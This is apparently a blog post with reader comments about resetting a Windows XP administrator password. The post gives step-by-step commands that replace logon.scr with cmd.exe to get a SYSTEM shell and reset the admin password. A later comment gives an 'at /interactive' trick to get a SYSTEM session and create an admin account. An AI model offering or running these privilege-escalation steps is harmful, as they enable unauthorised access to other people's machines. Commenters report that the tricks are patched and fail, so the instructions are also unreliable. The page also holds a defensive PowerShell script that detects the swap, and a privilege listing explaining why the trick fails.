Reset the Windows XP Admin Password
Either run cmd from a limited account, or get into Recovery mode using the installation CD. Then type the following:
cd c:\windows\system32
mkdir backup
copy logon.scr backup
copy cmd.exe backup
del logon.scr
ren cmd.exe logon.scr
After these commands, the next time the screensaver kicks in you can use the following command to reset the admin password.
net user <admin account> new-password
Remember to reverse what you did up there after resetting the password. You can do this by running:
cd c:\windows\system32
ren logon.scr cmd.exe
copy backup\logon.scr .
del backup\*
rd backup


Has anyone already tried this?
It looks very easy … maybe a little too easy?
A while ago I lost my XP password and it took me a lot of effort to reset it.
why not just use the Offline NT Password & Registry Editor: http://home.eunet.no/pnordahl/ntpasswd/
The LOGON.SCR trick does not work w/ current (all?) WXP installations on several fronts.
1) If you can replace logon.scr with cmd.exe, “Windows File Protection” (WFP) will undo it. So you’d have to be able to disable that first OR change the registry value for SCRNSAVE.EXE in [HKEY_USERS\S-1-5-18\Control Panel\Desktop] from logon.scr to cmd.exe
2) Assuming you get cmd.exe in as the screen saver for SYSTEM and wait the 10 +/- minutes, a CMD box will pop up as noted under the user SYSTEM.
3) You try to do a NET USER Administrator and you get “System error 5 has occurred. Access is denied” — how can this be? Isn’t SYSTEM all powerful?
4) SYSTEM is all powerful but Microsoft fixed this back door by removing almost all of SYSTEM’s privs. Running a “whoami /user /groups /priv” for a normal SYSTEM session (AT hh:mm /INTERACTIVE cmd) gives:
[User] = “NT AUTHORITY\SYSTEM”
[Group 1] = “BUILTIN\Administrators”
[Group 2] = “Everyone”
[Group 3] = “NT AUTHORITY\Authenticated Users”
(X) SeTcbPrivilege = Act as part of the operating system
(O) SeCreateTokenPrivilege = Create a token object
(O) SeTakeOwnershipPrivilege = Take ownership of files or other objects
(X) SeCreatePagefilePrivilege = Create a pagefile
(X) SeLockMemoryPrivilege = Lock pages in memory
(O) SeAssignPrimaryTokenPrivilege = Replace a process level token
(O) SeIncreaseQuotaPrivilege = Adjust memory quotas for a process
(X) SeIncreaseBasePriorityPrivilege = Increase scheduling priority
(X) SeCreatePermanentPrivilege = Create permanent shared objects
(X) SeDebugPrivilege = Debug programs
(X) SeAuditPrivilege = Generate security audits
(O) SeSecurityPrivilege = Manage auditing and security log
(O) SeSystemEnvironmentPrivilege = Modify firmware environment values
(X) SeChangeNotifyPrivilege = Bypass traverse checking
(O) SeBackupPrivilege = Back up files and directories
(O) SeRestorePrivilege = Restore files and directories
(O) SeShutdownPrivilege = Shut down the system
(X) SeLoadDriverPrivilege = Load and unload device drivers
(X) SeProfileSingleProcessPrivilege = Profile single process
(X) SeSystemtimePrivilege = Change the system time
(X) SeUndockPrivilege = Remove computer from docking station
(O) SeManageVolumePrivilege = Perform volume maintenance tasks
(X) SeImpersonatePrivilege = Impersonate a client after authentication
(X) SeCreateGlobalPrivilege = Create global objects
But running the same command from the LOGON.SCR replacement instance of CMD.EXE gives:
[User] = “NT AUTHORITY\SYSTEM”
[Group 1] = “BUILTIN\Administrators”
[Group 2] = “Everyone”
[Group 3] = “NT AUTHORITY\Authenticated Users”
(X) SeChangeNotifyPrivilege = Bypass traverse checking
That’s why this doesn’t work.
Rick Valstar
Star Consulting
r + last name + at + gmail + dot + com
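An added check, not part of the original post or of either comment: it looks for the logon.scr / cmd.exe swap that the post describes and for the SCRNSAVE.EXE value under HKEY_USERS\S-1-5-18 that Rick's comment mentions. The paths, the SID and the value name come from the page; the hash comparison and the VersionInfo check are this example's own method, and it assumes the genuine logon.scr reports its own name as OriginalFilename. Run it from an elevated prompt.

```powershell
# Added example (not from the original post): integrity checks for the
# logon.scr / cmd.exe swap and for SYSTEM's screensaver registry value.
# Uses only .NET and PowerShell features available on older PowerShell versions.

$sys32 = Join-Path $env:SystemRoot 'system32'
$findings = @()

# 1. Does logon.scr carry cmd.exe's original file name or the same bytes?
$scr = Join-Path $sys32 'logon.scr'
$cmd = Join-Path $sys32 'cmd.exe'
if (Test-Path $scr) {
    # Assumption: the genuine logon.scr names itself 'logon.scr' in its version resource
    $origName = (Get-Item $scr).VersionInfo.OriginalFilename
    if ($origName -and $origName -ne 'logon.scr') {
        $findings += "logon.scr reports OriginalFilename '$origName' (expected logon.scr)"
    }
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $hashScr = [BitConverter]::ToString($sha.ComputeHash([IO.File]::ReadAllBytes($scr)))
    $hashCmd = [BitConverter]::ToString($sha.ComputeHash([IO.File]::ReadAllBytes($cmd)))
    if ($hashScr -eq $hashCmd) {
        $findings += "logon.scr is byte-identical to cmd.exe"
    }
} else {
    $findings += "logon.scr is missing from $sys32"
}

# 2. Leftover staging directory from the procedure in the post.
if (Test-Path (Join-Path $sys32 'backup')) {
    $findings += "unexpected directory $sys32\backup exists"
}

# 3. SYSTEM's screensaver setting (HKEY_USERS\S-1-5-18) should point at a .scr file.
$key = 'Registry::HKEY_USERS\S-1-5-18\Control Panel\Desktop'
if (Test-Path $key) {
    $val = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'SCRNSAVE.EXE'
    if ($val -and ([IO.Path]::GetExtension($val) -ne '.scr')) {
        $findings += "SYSTEM SCRNSAVE.EXE is '$val' (not a .scr file)"
    }
}

if ($findings.Count -eq 0) {
    Write-Output 'No signs of the logon.scr swap found.'
} else {
    $findings | ForEach-Object { Write-Output "FINDING: $_" }
}
```

The three checks are independent on purpose: Windows File Protection may have restored logon.scr (check 1 clean) while the registry redirection Rick describes is still in place (check 3 fires), or the binaries may be untouched while the backup directory from the post's first step is still lying around.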
1. press “start”
2. run cmd
3. run at HH:MM /interactive “cmd.exe” (time HH:MM+1M)
4. press CTRL+ALT+DEL and disable explorer.exe (end process)
5. In the new black window, run explorer
After these commands the SYSTEM account starts and you can make your new admin account
enjoy!!!!!!
exploit is patched. no longer working
doesn’t work
Nonsense and disgusting commands